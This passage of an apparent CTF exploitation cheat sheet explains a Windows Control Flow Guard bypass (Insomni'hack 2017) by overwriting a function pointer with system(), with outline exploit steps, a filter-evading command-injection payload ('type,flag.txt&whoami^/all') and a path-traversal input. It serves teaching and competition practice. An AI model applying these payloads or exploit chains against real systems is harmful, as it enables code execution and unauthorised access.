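print(build_path(b"../flag.txt\n"))    # injected newline cuts off ".cfg"
```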

---

## Windows CFG Bypass Using system() as Valid Call Target (Insomni'hack 2017)

**Pattern:** Windows Control Flow Guard (CFG) validates indirect call targets at runtime, but `system()` from msvcrt is a valid CFG target, enabling exploitation via function pointer overwrite.

```python
from pwn import *

# On Windows with CFG, overwrite function pointer with system()
# system() is a valid call target in CFG bitmap — it's a legitimate API entry point
# CFG only validates that the target is a valid function start, not WHICH function

# If input filter blocks space (0x20), use comma as argument separator
# cmd.exe treats comma as equivalent to space in argument lists
payload = b"type,flag.txt&whoami^/all\x00"
# 'type,flag.txt' works because cmd.exe treats comma as argument separator
# ^ escapes the / character
# & chains commands

# Exploit chain:
# 1. Leak module base (defeat ASLR)
# 2. Find system() address via IAT or known offset in msvcrt
system_addr = msvcrt_base + system_offset

# 3. Overwrite a function pointer (vtable entry, callback, etc.)
write_addr(vtable_entry, system_addr)

# 4. Trigger the indirect call with controlled first argument
# The overwritten pointer now calls system(attacker_string)
trigger_call(payload)
```

```c
// Alternative: if building a local exploit, bypass character filters
// Comma replaces space, ^ escapes special chars
// system("type,flag.txt") == system("type flag.txt")
// system("cmd,/c,dir") == system("cmd /c dir")
```

**Key insight:** CFG only validates that the target is a valid function entry point -- it does not restrict which function is called. Since `system()` is a legitimate API exported by msvcrt, it passes CFG validation. Use comma instead of space and `^` for escaping when the input filter restricts certain characters. This applies to any Windows binary with CFG where you can overwrite an indirect call target.

**When to recognize:** Windows binary with CFG enabled (check with `dumpbin /headers` or `winchecksec`). Look for writable function pointers (vtables, callbacks, C++ objects) that are called via indirect `call [reg]` instructions. CFG prevents jumping to arbitrary code but allows calling any valid function.
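
The check CFG performs can be pictured with a toy model. This is a deliberately simplified sketch: real CFG consults a per-process bitmap with its own granularity rules, and the addresses and table below are made up.

```python
# Made-up table of valid indirect-call targets (function entry points)
FUNCTION_ENTRIES = {
    0x70001000: "system",
    0x70002000: "puts",
    0x70003000: "on_message",          # the callback the program meant to call
}

def guard_check(target: int) -> bool:
    """Toy CFG check: is `target` a known function entry?"""
    return target in FUNCTION_ENTRIES

def indirect_call(target: int, arg: str) -> str:
    if not guard_check(target):
        raise RuntimeError(f"CFG violation: {target:#x} is not a valid call target")
    return f"{FUNCTION_ENTRIES[target]}({arg!r})"

print(indirect_call(0x70001000, "type,flag.txt"))   # swapped-in pointer passes the check
print(guard_check(0x70001004))                      # mid-function gadget is rejected
```

The model shows the gap being exploited: the check answers "is this a function?", never "is this the function the call site expected?".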

**References:** Insomni'hack 2017

---

See [advanced-exploits.md](advanced-exploits.md) for VM signed comparison, BF JIT shellcode, type confusion, ASAN shadow memory, format string with encoding constraints, MD5 preimage gadgets, VM GC UAF, FSOP + seccomp bypass, and stack variable overlap techniques.

See [rop-advanced.md](rop-advanced.md) for `.fini_array` hijack details.

See [sandbox-escape.md](sandbox-escape.md) for shell tricks and restricted environment techniques.